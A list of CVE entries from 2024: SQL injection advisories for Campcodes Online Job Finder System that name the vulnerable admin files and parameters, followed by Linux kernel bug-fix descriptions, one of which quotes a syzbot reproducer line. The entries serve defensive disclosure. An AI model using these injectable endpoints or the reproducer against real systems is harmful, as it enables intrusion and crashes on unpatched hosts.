CVE    2024    2671    Candidate    A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been declared as critical. Affected by this vulnerability is an unknown functionality of the file /admin/user/index.php. The manipulation of the argument id leads to sql injection. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-257371.    MISC:VDB-257371 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257371   |   MISC:VDB-257371 | Campcodes Online Job Finder System index.php sql injection   |   URL:https://vuldb.com/?id.257371   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%204.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%204.pdf    Assigned (20240319)
CVE    2024    2670    Candidate    A vulnerability was found in Campcodes Online Job Finder System 1.0. It has been classified as critical. Affected is an unknown function of the file /admin/vacancy/index.php. The manipulation of the argument id leads to sql injection. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used. VDB-257370 is the identifier assigned to this vulnerability.    MISC:VDB-257370 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257370   |   MISC:VDB-257370 | Campcodes Online Job Finder System index.php sql injection   |   URL:https://vuldb.com/?id.257370   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%203.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%203.pdf    Assigned (20240319)
CVE    2024    2669    Candidate    A vulnerability was found in Campcodes Online Job Finder System 1.0 and classified as critical. This issue affects some unknown processing of the file /admin/employee/controller.php of the component GET Parameter Handler. The manipulation of the argument EMPLOYEEID leads to sql injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier VDB-257369 was assigned to this vulnerability.    MISC:VDB-257369 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257369   |   MISC:VDB-257369 | Campcodes Online Job Finder System GET Parameter controller.php sql injection   |   URL:https://vuldb.com/?id.257369   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%202.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%202.pdf    Assigned (20240319)
CVE    2024    2668    Candidate    A vulnerability has been found in Campcodes Online Job Finder System 1.0 and classified as critical. This vulnerability affects unknown code of the file /admin/vacancy/controller.php. The manipulation of the argument id/CATEGORY leads to sql injection. The attack can be initiated remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-257368.    MISC:VDB-257368 | CTI Indicators (IOB, IOC, TTP, IOA)   |   URL:https://vuldb.com/?ctiid.257368   |   MISC:VDB-257368 | Campcodes Online Job Finder System controller.php sql injection   |   URL:https://vuldb.com/?id.257368   |   MISC:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2010.pdf   |   URL:https://github.com/E1CHO/cve_hub/blob/main/Online%20Job%20Finder%20System/Online%20Job%20Finder%20System%20-%20vuln%2010.pdf    Assigned (20240319)
CVE    2024    26643    Candidate    In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: mark set as dead when unbinding anonymous set with timeout While the rhashtable set gc runs asynchronously, a race allows it to collect elements from anonymous sets with timeouts while it is being released from the commit path. Mingi Cho originally reported this issue in a different path in 6.1.x with a pipapo set with low timeouts which is not possible upstream since 7395dfacfff6 ("netfilter: nf_tables: use timestamp to check for set element timeout"). Fix this by setting on the dead flag for anonymous sets to skip async gc in this case. According to 08e4c8c5919f ("netfilter: nf_tables: mark newset as dead on transaction abort"), Florian plans to accelerate abort path by releasing objects via workqueue, therefore, this sets on the dead flag for abort path too.    MISC:https://git.kernel.org/stable/c/552705a3650bbf46a22b1adedc1b04181490fc36   |   URL:https://git.kernel.org/stable/c/552705a3650bbf46a22b1adedc1b04181490fc36    Assigned (20240219)
CVE    2024    26642    Candidate    In the Linux kernel, the following vulnerability has been resolved: netfilter: nf_tables: disallow anonymous set with timeout flag Anonymous sets are never used with timeout from userspace, reject this. Exception to this rule is NFT_SET_EVAL to ensure legacy meters still work.    MISC:https://git.kernel.org/stable/c/16603605b667b70da974bea8216c93e7db043bf1   |   URL:https://git.kernel.org/stable/c/16603605b667b70da974bea8216c93e7db043bf1    Assigned (20240219)
CVE    2024    26641    Candidate    In the Linux kernel, the following vulnerability has been resolved: ip6_tunnel: make sure to pull inner header in __ip6_tnl_rcv() syzbot found __ip6_tnl_rcv() could access uninitialized data [1]. Call pskb_inet_may_pull() to fix this, and initialize ipv6h variable after this call as it can change skb->head.    MISC:https://git.kernel.org/stable/c/350a6640fac4b53564ec20aa3f4a0922cb0ba5e6   |   URL:https://git.kernel.org/stable/c/350a6640fac4b53564ec20aa3f4a0922cb0ba5e6   |   MISC:https://git.kernel.org/stable/c/8d975c15c0cd744000ca386247432d57b21f9df0   |   URL:https://git.kernel.org/stable/c/8d975c15c0cd744000ca386247432d57b21f9df0   |   MISC:https://git.kernel.org/stable/c/a9bc32879a08f23cdb80a48c738017e39aea1080   |   URL:https://git.kernel.org/stable/c/a9bc32879a08f23cdb80a48c738017e39aea1080   |   
MISC:https://git.kernel.org/stable/c/af6b5c50d47ab43e5272ad61935d0ed2e264d3f0   |   URL:https://git.kernel.org/stable/c/af6b5c50d47ab43e5272ad61935d0ed2e264d3f0   |   MISC:https://git.kernel.org/stable/c/c835df3bcc14858ae9b27315dd7de76370b94f3a   |   URL:https://git.kernel.org/stable/c/c835df3bcc14858ae9b27315dd7de76370b94f3a   |   MISC:https://git.kernel.org/stable/c/d54e4da98bbfa8c257bdca94c49652d81d18a4d8   |   URL:https://git.kernel.org/stable/c/d54e4da98bbfa8c257bdca94c49652d81d18a4d8    Assigned (20240219)
CVE    2024    26640    Candidate    In the Linux kernel, the following vulnerability has been resolved: tcp: add sanity checks to rx zerocopy TCP rx zerocopy intent is to map pages initially allocated from NIC drivers, not pages owned by a fs. This patch adds to can_map_frag() these additional checks: - Page must not be a compound one. - page->mapping must be NULL. This fixes the panic reported by ZhangPeng. syzbot was able to loopback packets built with sendfile(), mapping pages owned by an ext4 file to TCP rx zerocopy.    MISC:https://git.kernel.org/stable/c/1b8adcc0e2c584fec778add7777fe28e20781e60   |   URL:https://git.kernel.org/stable/c/1b8adcc0e2c584fec778add7777fe28e20781e60   |   MISC:https://git.kernel.org/stable/c/577e4432f3ac810049cb7e6b71f4d96ec7c6e894   |   URL:https://git.kernel.org/stable/c/577e4432f3ac810049cb7e6b71f4d96ec7c6e894   |   MISC:https://git.kernel.org/stable/c/718f446e60316bf606946f7f42367d691d21541e   |   URL:https://git.kernel.org/stable/c/718f446e60316bf606946f7f42367d691d21541e   |   MISC:https://git.kernel.org/stable/c/b383d4ea272fe5795877506dcce5aad1f6330e5e   |   URL:https://git.kernel.org/stable/c/b383d4ea272fe5795877506dcce5aad1f6330e5e   |   MISC:https://git.kernel.org/stable/c/d15cc0f66884ef2bed28c7ccbb11c102aa3a0760   |   
URL:https://git.kernel.org/stable/c/d15cc0f66884ef2bed28c7ccbb11c102aa3a0760   |   MISC:https://git.kernel.org/stable/c/f48bf9a83b1666d934247cb58a9887d7b3127b6f   |   URL:https://git.kernel.org/stable/c/f48bf9a83b1666d934247cb58a9887d7b3127b6f    Assigned (20240219)
CVE    2024    26639    Candidate    In the Linux kernel, the following vulnerability has been resolved: mm, kmsan: fix infinite recursion due to RCU critical section Alexander Potapenko writes in [1]: "For every memory access in the code instrumented by KMSAN we call kmsan_get_metadata() to obtain the metadata for the memory being accessed. For virtual memory the metadata pointers are stored in the corresponding `struct page`, therefore we need to call virt_to_page() to get them. According to the comment in arch/x86/include/asm/page.h, virt_to_page(kaddr) returns a valid pointer iff virt_addr_valid(kaddr) is true, so KMSAN needs to call virt_addr_valid() as well. To avoid recursion, kmsan_get_metadata() must not call instrumented code, therefore ./arch/x86/include/asm/kmsan.h forks parts of arch/x86/mm/physaddr.c to check whether a virtual address is valid or not. But the introduction of rcu_read_lock() to pfn_valid() added instrumented RCU API calls to virt_to_page_or_null(), which is called by kmsan_get_metadata(), so there is an infinite recursion now. I do not think it is correct to stop that recursion by doing kmsan_enter_runtime()/kmsan_exit_runtime() in kmsan_get_metadata(): that would prevent instrumented functions called from within the runtime from tracking the shadow values, which might introduce false positives." Fix the issue by switching pfn_valid() to the _sched() variant of rcu_read_lock/unlock(), which does not require calling into RCU. Given the critical section in pfn_valid() is very small, this is a reasonable trade-off (with preemptible RCU). KMSAN further needs to be careful to suppress calls into the scheduler, which would be another source of recursion. This can be done by wrapping the call to pfn_valid() into preempt_disable/enable_no_resched(). The downside is that this sacrifices breaking scheduling guarantees; however, a kernel compiled with KMSAN has already given up any performance guarantees due to being heavily instrumented. 
Note, KMSAN code already disables tracing via Makefile, and since mmzone.h is included, it is not necessary to use the notrace variant, which is generally preferred in all other cases.    MISC:https://git.kernel.org/stable/c/5a33420599fa0288792537e6872fd19cc8607ea6   |   URL:https://git.kernel.org/stable/c/5a33420599fa0288792537e6872fd19cc8607ea6   |   MISC:https://git.kernel.org/stable/c/6335c0cdb2ea0ea02c999e04d34fd84f69fb27ff   |   URL:https://git.kernel.org/stable/c/6335c0cdb2ea0ea02c999e04d34fd84f69fb27ff   |   MISC:https://git.kernel.org/stable/c/dc904345e3771aa01d0b8358b550802fdc6fe00b   |   URL:https://git.kernel.org/stable/c/dc904345e3771aa01d0b8358b550802fdc6fe00b    Assigned (20240219)
CVE    2024    26638    Candidate    In the Linux kernel, the following vulnerability has been resolved: nbd: always initialize struct msghdr completely syzbot complains that msg->msg_get_inq value can be uninitialized [1]. struct msghdr got many new fields recently, we should always make sure their values are zero by default.    MISC:https://git.kernel.org/stable/c/1960f2b534da1e6c65fb96f9e98bda773495f406   |   URL:https://git.kernel.org/stable/c/1960f2b534da1e6c65fb96f9e98bda773495f406   |   MISC:https://git.kernel.org/stable/c/78fbb92af27d0982634116c7a31065f24d092826   |   URL:https://git.kernel.org/stable/c/78fbb92af27d0982634116c7a31065f24d092826   |   MISC:https://git.kernel.org/stable/c/b0028f333420a65a53a63978522db680b37379dd   |   URL:https://git.kernel.org/stable/c/b0028f333420a65a53a63978522db680b37379dd   |   
MISC:https://git.kernel.org/stable/c/d9c54763e5cdbbd3f81868597fe8aca3c96e6387   |   URL:https://git.kernel.org/stable/c/d9c54763e5cdbbd3f81868597fe8aca3c96e6387    Assigned (20240219)
CVE    2024    26637    Candidate    In the Linux kernel, the following vulnerability has been resolved: wifi: ath11k: rely on mac80211 debugfs handling for vif mac80211 started to delete debugfs entries in certain cases, causing ath11k to crash when it tried to delete the entries later. Fix this by relying on mac80211 to delete the entries when appropriate and adding them from the vif_add_debugfs handler.    MISC:https://git.kernel.org/stable/c/556857aa1d0855aba02b1c63bc52b91ec63fc2cc   |   URL:https://git.kernel.org/stable/c/556857aa1d0855aba02b1c63bc52b91ec63fc2cc   |   MISC:https://git.kernel.org/stable/c/aa74ce30a8a40d19a4256de4ae5322e71344a274   |   URL:https://git.kernel.org/stable/c/aa74ce30a8a40d19a4256de4ae5322e71344a274    Assigned (20240219)
CVE    2024    26636    Candidate    In the Linux kernel, the following vulnerability has been resolved: llc: make llc_ui_sendmsg() more robust against bonding changes syzbot was able to trick llc_ui_sendmsg(), allocating an skb with no headroom, but subsequently trying to push 14 bytes of Ethernet header [1] Like some others, llc_ui_sendmsg() releases the socket lock before calling sock_alloc_send_skb(). Then it acquires it again, but does not redo all the sanity checks that were performed. This fix: - Uses LL_RESERVED_SPACE() to reserve space. - Check all conditions again after socket lock is held again. - Do not account Ethernet header for mtu limitation.    MISC:https://git.kernel.org/stable/c/04f2a74b562f3a7498be0399309669f342793d8c   |   URL:https://git.kernel.org/stable/c/04f2a74b562f3a7498be0399309669f342793d8c   |   MISC:https://git.kernel.org/stable/c/6d53b813ff8b177f86f149c2f744442681f720e4   |   
URL:https://git.kernel.org/stable/c/6d53b813ff8b177f86f149c2f744442681f720e4   |   MISC:https://git.kernel.org/stable/c/84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b   |   URL:https://git.kernel.org/stable/c/84e9d10419f6f4f3f3cd8f9aaf44a48719aa4b1b   |   MISC:https://git.kernel.org/stable/c/b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d   |   URL:https://git.kernel.org/stable/c/b643d0defcbacd7fe548bc65c3e4e6f17dc5eb2d   |   MISC:https://git.kernel.org/stable/c/c22044270da68881074fda81a7d34812726cb249   |   URL:https://git.kernel.org/stable/c/c22044270da68881074fda81a7d34812726cb249   |   MISC:https://git.kernel.org/stable/c/c451c008f563d56d5e676c9dcafae565fcad84bb   |   URL:https://git.kernel.org/stable/c/c451c008f563d56d5e676c9dcafae565fcad84bb   |   MISC:https://git.kernel.org/stable/c/cafd3ad3fe03ef4d6632747be9ee15dc0029db4b   |   URL:https://git.kernel.org/stable/c/cafd3ad3fe03ef4d6632747be9ee15dc0029db4b   |   MISC:https://git.kernel.org/stable/c/dad555c816a50c6a6a8a86be1f9177673918c647   |   URL:https://git.kernel.org/stable/c/dad555c816a50c6a6a8a86be1f9177673918c647    Assigned (20240219)
CVE    2024    26635    Candidate    In the Linux kernel, the following vulnerability has been resolved: llc: Drop support for ETH_P_TR_802_2. syzbot reported an uninit-value bug below. [0] llc supports ETH_P_802_2 (0x0004) and used to support ETH_P_TR_802_2 (0x0011), and syzbot abused the latter to trigger the bug. write$tun(r0, &(0x7f0000000040)={@val={0x0, 0x11}, @val, @mpls={[], @llc={@snap={0xaa, 0x1, ')', "90e5dd"}}}}, 0x16) llc_conn_handler() initialises local variables {saddr,daddr}.mac based on skb in llc_pdu_decode_sa()/llc_pdu_decode_da() and passes them to __llc_lookup(). However, the initialisation is done only when skb->protocol is htons(ETH_P_802_2), otherwise, __llc_lookup_established() and __llc_lookup_listener() will read garbage. The missing initialisation existed prior to commit 211ed865108e ("net: delete all instances of special processing for token ring"). It removed the part to kick out the token ring stuff but forgot to close the door allowing ETH_P_TR_802_2 packets to sneak into llc_rcv(). Let's remove llc_tr_packet_type and complete the deprecation. 
MISC:https://git.kernel.org/stable/c/165ad1e22779685c3ed3dd349c6c4c632309cc62   |   URL:https://git.kernel.org/stable/c/165ad1e22779685c3ed3dd349c6c4c632309cc62   |   MISC:https://git.kernel.org/stable/c/660c3053d992b68fee893a0e9ec9159228cffdc6   |   URL:https://git.kernel.org/stable/c/660c3053d992b68fee893a0e9ec9159228cffdc6   |   MISC:https://git.kernel.org/stable/c/9ccdef19cf9497c2803b005369668feb91cacdfd   |   URL:https://git.kernel.org/stable/c/9ccdef19cf9497c2803b005369668feb91cacdfd   |   MISC:https://git.kernel.org/stable/c/b8e8838f82f332ae80c643dbb1ca4418d0628097   |   
URL:https://git.kernel.org/stable/c/b8e8838f82f332ae80c643dbb1ca4418d0628097   |   MISC:https://git.kernel.org/stable/c/c0fe2fe7a5a291dfcf6dc64301732c8d3dc6a828   |   URL:https://git.kernel.org/stable/c/c0fe2fe7a5a291dfcf6dc64301732c8d3dc6a828   |   MISC:https://git.kernel.org/stable/c/df57fc2f2abf548aa889a36ab0bdcc94a75399dc   |   URL:https://git.kernel.org/stable/c/df57fc2f2abf548aa889a36ab0bdcc94a75399dc   |   MISC:https://git.kernel.org/stable/c/e3f9bed9bee261e3347131764e42aeedf1ffea61   |   URL:https://git.kernel.org/stable/c/e3f9bed9bee261e3347131764e42aeedf1ffea61   |   MISC:https://git.kernel.org/stable/c/f1f34a515fb1e25e85dee94f781e7869ae351fb8   |   URL:https://git.kernel.org/stable/c/f1f34a515fb1e25e85dee94f781e7869ae351fb8    Assigned (20240219)
CVE    2024    26634    Candidate    In the Linux kernel, the following vulnerability has been resolved: net: fix removing a namespace with conflicting altnames Mark reports a BUG() when a net namespace is removed. kernel BUG at net/core/dev.c:11520! Physical interfaces moved outside of init_net get "refunded" to init_net when that namespace disappears. The main interface name may get overwritten in the process if it would have conflicted. We need to also discard all conflicting altnames. Recent fixes addressed ensuring that altnames get moved with the main interface, which surfaced this problem.    MISC:https://git.kernel.org/stable/c/8072699aa9e67d1727692cfb3c347263bb627fb9   |   URL:https://git.kernel.org/stable/c/8072699aa9e67d1727692cfb3c347263bb627fb9   |   MISC:https://git.kernel.org/stable/c/a2232f29bf52c24f827865b3c90829c44b6c695b   |   URL:https://git.kernel.org/stable/c/a2232f29bf52c24f827865b3c90829c44b6c695b   |   MISC:https://git.kernel.org/stable/c/d09486a04f5da0a812c26217213b89a3b1acf836   |   URL:https://git.kernel.org/stable/c/d09486a04f5da0a812c26217213b89a3b1acf836   |   MISC:https://git.kernel.org/stable/c/e855dded4b70d1975ee7b9fed0c700391e3c8ea6   |   URL:https://git.kernel.org/stable/c/e855dded4b70d1975ee7b9fed0c700391e3c8ea6    Assigned (20240219)
CVE    2024    26633    Candidate    In the Linux kernel, the following vulnerability has been resolved: ip6_tunnel: fix NEXTHDR_FRAGMENT handling in ip6_tnl_parse_tlv_enc_lim() syzbot pointed out [1] that NEXTHDR_FRAGMENT handling is broken. Reading frag_off can only be done if we pulled enough bytes to skb->head. Currently we might access garbage. ---truncated---    MISC:https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee   |   URL:https://git.kernel.org/stable/c/135414f300c5db995e2a2f3bf0f455de9d014aee   |   MISC:https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c   |   URL:https://git.kernel.org/stable/c/3f15ba3dc14e6ee002ea01b4faddc3d49200377c   |   MISC:https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d   |   URL:https://git.kernel.org/stable/c/4329426cf6b8e22b798db2331c7ef1dd2a9c748d   |   MISC:https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2   |   URL:https://git.kernel.org/stable/c/62a1fedeb14c7ac0947ef33fadbabd35ed2400a2   |   MISC:https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183   |   URL:https://git.kernel.org/stable/c/687c5d52fe53e602e76826dbd4d7af412747e183   |   MISC:https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087   |   URL:https://git.kernel.org/stable/c/ba8d904c274268b18ef3dc11d3ca7b24a96cb087   |   MISC:https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198   |   URL:https://git.kernel.org/stable/c/d375b98e0248980681e5e56b712026174d617198   |   MISC:https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd   |   URL:https://git.kernel.org/stable/c/da23bd709b46168f7dfc36055801011222b076cd    Assigned (20240219)
CVE    2024    26632    Candidate    In the Linux kernel, the following vulnerability has been resolved: block: Fix iterating over an empty bio with bio_for_each_folio_all If the bio contains no data, bio_first_folio() calls page_folio() on a NULL pointer and oopses. Move the test that we've reached the end of the bio from bio_next_folio() to bio_first_folio(). [axboe: add unlikely() to error case]    MISC:https://git.kernel.org/stable/c/7bed6f3d08b7af27b7015da8dc3acf2b9c1f21d7   |   URL:https://git.kernel.org/stable/c/7bed6f3d08b7af27b7015da8dc3acf2b9c1f21d7   |   MISC:https://git.kernel.org/stable/c/a6bd8182137a12d22d3f2cee463271bdcb491659   |   URL:https://git.kernel.org/stable/c/a6bd8182137a12d22d3f2cee463271bdcb491659   |   MISC:https://git.kernel.org/stable/c/c6350b5cb78e9024c49eaee6fdb914ad2903a5fe   |   URL:https://git.kernel.org/stable/c/c6350b5cb78e9024c49eaee6fdb914ad2903a5fe   |   MISC:https://git.kernel.org/stable/c/ca3ede3f5893e2d26d4dbdef1eec28a8487fafde   |   URL:https://git.kernel.org/stable/c/ca3ede3f5893e2d26d4dbdef1eec28a8487fafde    Assigned (20240219)
CVE    2024    26631    Candidate    In the Linux kernel, the following vulnerability has been resolved: ipv6: mcast: fix data-race in ipv6_mc_down / mld_ifc_work idev->mc_ifc_count can be written over without proper locking. Originally found by syzbot [1], fix this issue by encapsulating calls to mld_ifc_stop_work() (and mld_gq_stop_work() for good measure) with mutex_lock() and mutex_unlock() accordingly as these functions should only be called with mc_lock per their declarations. [1] BUG: KCSAN: data-race in ipv6_mc_down / mld_ifc_work ...    
MISC:https://git.kernel.org/stable/c/2e7ef287f07c74985f1bf2858bedc62bd9ebf155   |   URL:https://git.kernel.org/stable/c/2e7ef287f07c74985f1bf2858bedc62bd9ebf155   |   MISC:https://git.kernel.org/stable/c/380540bb06bb1d1b12bdc947d1b8f56cda6b5663   |   URL:https://git.kernel.org/stable/c/380540bb06bb1d1b12bdc947d1b8f56cda6b5663   |   MISC:https://git.kernel.org/stable/c/3bb5849675ae1d592929798a2b37ea450879c855   |   URL:https://git.kernel.org/stable/c/3bb5849675ae1d592929798a2b37ea450879c855   |   MISC:https://git.kernel.org/stable/c/3cc283fd16fba72e2cefe3a6f48d7a36b0438900   |   URL:https://git.kernel.org/stable/c/3cc283fd16fba72e2cefe3a6f48d7a36b0438900   |   MISC:https://git.kernel.org/stable/c/62b3387beef11738eb6ce667601a28fa089fa02c   |   URL:https://git.kernel.org/stable/c/62b3387beef11738eb6ce667601a28fa089fa02c    Assigned (20240219)
CVE    2024    26630    Candidate    In the Linux kernel, the following vulnerability has been resolved: mm: cachestat: fix folio read-after-free in cache walk In cachestat, we access the folio from the page cache's xarray to compute its page offset, and check for its dirty and writeback flags. However, we do not hold a reference to the folio before performing these actions, which means the folio can concurrently be released and reused as another folio/page/slab. Get around this altogether by just using xarray's existing machinery for the folio page offsets and dirty/writeback states. This changes behavior for tmpfs files to now always report zeroes in their dirty and writeback counters. This is okay as tmpfs doesn't follow conventional writeback cache behavior: its pages get "cleaned" during swapout, after which they're no longer resident etc.    MISC:https://git.kernel.org/stable/c/3a75cb05d53f4a6823a32deb078de1366954a804   |   URL:https://git.kernel.org/stable/c/3a75cb05d53f4a6823a32deb078de1366954a804   |   MISC:https://git.kernel.org/stable/c/ba60fdf75e89ea762bb617be578dc47f27655117   |   URL:https://git.kernel.org/stable/c/ba60fdf75e89ea762bb617be578dc47f27655117   |   MISC:https://git.kernel.org/stable/c/fe7e008e0ce728252e4ec652cceebcc62211657c   |   URL:https://git.kernel.org/stable/c/fe7e008e0ce728252e4ec652cceebcc62211657c    Assigned (20240219)
CVE    2024    26629    Candidate    In the Linux kernel, the following vulnerability has been resolved: nfsd: fix RELEASE_LOCKOWNER The test on so_count in nfsd4_release_lockowner() is nonsense and harmful. Revert to using check_for_locks(), changing that to not sleep. First: harmful. As is documented in the kdoc comment for nfsd4_release_lockowner(), the test on so_count can transiently return a false positive resulting in a return of NFS4ERR_LOCKS_HELD when in fact no locks are held. This is clearly a protocol violation and with the Linux NFS client it can cause incorrect behaviour. If RELEASE_LOCKOWNER is sent while some other thread is still processing a LOCK request which failed because, at the time that request was received, the given owner held a conflicting lock, then the nfsd thread processing that LOCK request can hold a reference (conflock) to the lock owner that causes nfsd4_release_lockowner() to return an incorrect error. The Linux NFS client ignores that NFS4ERR_LOCKS_HELD error because it never sends NFS4_RELEASE_LOCKOWNER without first releasing any locks, so it knows that the error is impossible. It assumes the lock owner was in fact released so it feels free to use the same lock owner identifier in some later locking request. When it does reuse a lock owner identifier for which a previous RELEASE failed, it will naturally use a lock_seqid of zero. However the server, which didn't release the lock owner, will expect a larger lock_seqid and so will respond with NFS4ERR_BAD_SEQID. So clearly it is harmful to allow a false positive, which testing so_count allows. The test is nonsense because ... well... it doesn't mean anything. so_count is the sum of three different counts. 1/ the set of states listed on so_stateids 2/ the set of active vfs locks owned by any of those states 3/ various transient counts such as for conflicting locks. 
When it is tested against '2' it is clear that one of these is the transient reference obtained by find_lockowner_str_locked(). It is not clear what the other one is expected to be. In practice, the count is often 2 because there is precisely one state on so_stateids. If there were more, this would fail. In my testing I see two circumstances when RELEASE_LOCKOWNER is called. In one case, CLOSE is called before RELEASE_LOCKOWNER. That results in all the lock states being removed, and so the lockowner being discarded (it is removed when there are no more references which usually happens when the lock state is discarded). When nfsd4_release_lockowner() finds that the lock owner doesn't exist, it returns success. The other case shows an so_count of '2' and precisely one state listed in so_stateid. It appears that the Linux client uses a separate lock owner for each file resulting in one lock state per lock owner, so this test on '2' is safe. For another client it might not be safe. So this patch changes check_for_locks() to use the (newish) find_any_file_locked() so that it doesn't take a reference on the nfs4_file and so never calls nfsd_file_put(), and so never sleeps. With this check it is safe to restore the use of check_for_locks() rather than testing so_count against the mysterious '2'.    MISC:https://git.kernel.org/stable/c/8f5b860de87039b007e84a28a5eefc888154e098   |   URL:https://git.kernel.org/stable/c/8f5b860de87039b007e84a28a5eefc888154e098   |   MISC:https://git.kernel.org/stable/c/b7d2eee1f53899b53f069bba3a59a419fc3d331b   |   URL:https://git.kernel.org/stable/c/b7d2eee1f53899b53f069bba3a59a419fc3d331b   |   MISC:https://git.kernel.org/stable/c/e4cf8941664cae2f89f0189c29fe2ce8c6be0d03   |   URL:https://git.kernel.org/stable/c/e4cf8941664cae2f89f0189c29fe2ce8c6be0d03   |   MISC:https://git.kernel.org/stable/c/edcf9725150e42beeca42d085149f4c88fa97afd   |   URL:https://git.kernel.org/stable/c/edcf9725150e42beeca42d085149f4c88fa97afd    Assigned (20240219)
CVE    2024    26628    Candidate    ** REJECT ** This CVE ID has been rejected or withdrawn by its CVE Numbering Authority.        Assigned (20240219)
CVE    2024    26627    Candidate    In the Linux kernel, the following vulnerability has been resolved: scsi: core: Move scsi_host_busy() out of host lock for waking up EH handler Inside scsi_eh_wakeup(), scsi_host_busy() is called & checked with host lock every time for deciding if error handler kthread needs to be woken up. This can be too heavy in case of recovery, such as: - N hardware queues - queue depth is M for each hardware queue - each scsi_host_busy() iterates over (N * M) tag/requests If recovery is triggered in case that all requests are in-flight, each scsi_eh_wakeup() is strictly serialized, when scsi_eh_wakeup() is called for the last in-flight request, scsi_host_busy() has been run for (N * M - 1) times, and request has been iterated for (N*M - 1) * (N * M) times. If both N and M are big enough, hard lockup can be triggered on acquiring host lock, and it is observed on mpi3mr (128 hw queues, queue depth 8169). Fix the issue by calling scsi_host_busy() outside the host lock. We don't need the host lock for getting busy count because the host lock never covers that. 
[mkp: Drop unnecessary 'busy' variables pointed out by Bart]    MISC:https://git.kernel.org/stable/c/07e3ca0f17f579491b5f54e9ed05173d6c1d6fcb   |   URL:https://git.kernel.org/stable/c/07e3ca0f17f579491b5f54e9ed05173d6c1d6fcb   |   MISC:https://git.kernel.org/stable/c/4373534a9850627a2695317944898eb1283a2db0   |   URL:https://git.kernel.org/stable/c/4373534a9850627a2695317944898eb1283a2db0   |   MISC:https://git.kernel.org/stable/c/65ead8468c21c2676d4d06f50b46beffdea69df1   |   URL:https://git.kernel.org/stable/c/65ead8468c21c2676d4d06f50b46beffdea69df1   |   MISC:https://git.kernel.org/stable/c/d37c1c81419fdef66ebd0747cf76fb8b7d979059   |   URL:https://git.kernel.org/stable/c/d37c1c81419fdef66ebd0747cf76fb8b7d979059   |   MISC:https://git.kernel.org/stable/c/db6338f45971b4285ea368432a84033690eaf53c   |   URL:https://git.kernel.org/stable/c/db6338f45971b4285ea368432a84033690eaf53c   |   MISC:https://git.kernel.org/stable/c/f5944853f7a961fedc1227dc8f60393f8936d37c   |   URL:https://git.kernel.org/stable/c/f5944853f7a961fedc1227dc8f60393f8936d37c    Assigned (20240219)
CVE    2024    26626    Candidate    In the Linux kernel, the following vulnerability has been resolved: ipmr: fix kernel panic when forwarding mcast packets The stacktrace was: [ 86.305548] BUG: kernel NULL pointer dereference, address: 0000000000000092 ---truncated---    MISC:https://git.kernel.org/stable/c/2e8c9ae40adda2be1ba41c05fd3cd1e61cce3207   |   URL:https://git.kernel.org/stable/c/2e8c9ae40adda2be1ba41c05fd3cd1e61cce3207   |   MISC:https://git.kernel.org/stable/c/d2f1b7fe74afd66298dbb3c7b39e7b62e4df1724   |   URL:https://git.kernel.org/stable/c/d2f1b7fe74afd66298dbb3c7b39e7b62e4df1724   |   MISC:https://git.kernel.org/stable/c/dcaafdba6c6162bb49f1192850bc3bbc3707738c   |   URL:https://git.kernel.org/stable/c/dcaafdba6c6162bb49f1192850bc3bbc3707738c    Assigned (20240219)
CVE    2024    26625    Candidate    In the Linux kernel, the following vulnerability has been resolved: llc: call sock_orphan() at release time syzbot reported an interesting trace [1] caused by a stale sk->sk_wq pointer in a closed llc socket. In commit ff7b11aa481f ("net: socket: set sock->sk to NULL after calling proto_ops::release()") Eric Biggers hinted that some protocols are missing a sock_orphan(), we need to perform a full audit. In net-next, I plan to clear sock->sk from sock_orphan() and amend Eric patch to add a warning. [1] BUG: KASAN: slab-use-after-free in list_empty include/linux/list.h:373 [inline] BUG: KASAN: slab-use-after-free in waitqueue_active include/linux/wait.h:127 [inline] BUG: KASAN: slab-use-after-free in sock_def_write_space_wfree net/core/sock.c:3384 [inline] BUG: KASAN: slab-use-after-free in sock_wfree+0x9a8/0x9d0 net/core/sock.c:2468 ---truncated---    
